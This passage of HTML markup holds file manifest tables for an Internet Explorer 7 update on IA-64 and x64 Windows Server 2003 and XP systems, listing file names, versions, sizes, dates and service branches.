class=\"sbody-td\">161,792</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dat</td><td class=\"sbody-td\">7.0.6011.1</td><td class=\"sbody-td\">2,452,872</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dll</td><td class=\"sbody-td\">7.0.6000.16730</td><td class=\"sbody-td\">1,074,688</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedkcs32.dll</td><td class=\"sbody-td\">17.0.6000.21357</td><td class=\"sbody-td\">764,416</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieencode.dll</td><td class=\"sbody-td\">2017.0.0.21306</td><td class=\"sbody-td\">147,456</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">11,782,656</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll.mui</td><td class=\"sbody-td\">7.0.6000.16414</td><td class=\"sbody-td\">980,992</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">460,800</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iernonce.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">99,840</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">556,544</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieudinit.exe</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">30,720</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">795,288</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">2,440,192</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">82,432</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">1,045,504</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">144,384</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">10,153,472</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">1,531,904</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msrating.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">492,032</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">2,233,344</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Occache.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">275,968</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pngfilt.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">122,368</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">130,048</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">2,600,960</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">2,191,360</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Webcheck.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">653,824</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">1,940,992</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wadvpack.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">124,928</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wcorpol.dll</td><td class=\"sbody-td\">2007.0.0.21306</td><td class=\"sbody-td\">17,408</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wdxtmsft.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">347,136</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wdxtrans.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">214,528</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wextmgr.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">132,608</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Whtml.iec</td><td class=\"sbody-td\">2017.0.0.21306</td><td class=\"sbody-td\">389,120</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wicardie.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">63,488</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wie4uinit.exe</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">70,656</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieakeng.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">153,088</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieaksie.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">230,400</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieakui.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">161,792</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieapfltr.dat</td><td class=\"sbody-td\">7.0.6011.1</td><td class=\"sbody-td\">2,452,872</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieapfltr.dll</td><td class=\"sbody-td\">7.0.6000.16730</td><td class=\"sbody-td\">380,928</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wiedkcs32.dll</td><td class=\"sbody-td\">17.0.6000.21357</td><td class=\"sbody-td\">388,608</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieencode.dll</td><td class=\"sbody-td\">2017.0.0.21306</td><td class=\"sbody-td\">78,336</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieframe.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">6,108,672</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieframe.dll.mui</td><td class=\"sbody-td\">7.0.6000.16414</td><td class=\"sbody-td\">991,232</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wiepeers.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">193,024</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wiernonce.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">44,544</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wiertutil.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">268,288</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieudinit.exe</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">13,824</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wiexplore.exe</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">643,224</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Winetcpl.cpl</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">1,830,912</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wjsproxy.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">27,648</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmsfeeds.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">496,128</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmsfeedsbs.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">52,224</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmshtml.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">3,626,496</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmshtmled.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">480,256</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmsrating.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">193,024</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmstime.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">671,232</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Woccache.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">102,912</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wpngfilt.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">44,544</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wurl.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">106,496</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wurlmon.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">1,172,992</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wvgx.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">766,976</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wwebcheck.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">233,472</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wwininet.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">841,216</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr></table></div><h4 class=\"sbody-h4\">Internet Explorer 7 on all supported x64-based versions of Windows Server 2003 and Windows XP Professional </h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Advpack.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">161,280</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">2007.0.0.21306</td><td class=\"sbody-td\">22,016</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Dxtmsft.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">508,416</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Dxtrans.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">314,368</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Extmgr.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">207,360</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2017.0.0.21306</td><td class=\"sbody-td\">485,376</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Icardie.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">85,504</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie4uinit.exe</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">84,992</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieakeng.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">195,584</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieaksie.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">267,776</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieakui.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">161,792</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dat</td><td class=\"sbody-td\">7.0.6011.1</td><td class=\"sbody-td\">2,452,872</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dll</td><td class=\"sbody-td\">7.0.6000.16730</td><td class=\"sbody-td\">422,400</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedkcs32.dll</td><td class=\"sbody-td\">17.0.6000.21357</td><td class=\"sbody-td\">480,256</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieencode.dll</td><td class=\"sbody-td\">2017.0.0.21306</td><td class=\"sbody-td\">86,528</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">7,116,800</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll.mui</td><td 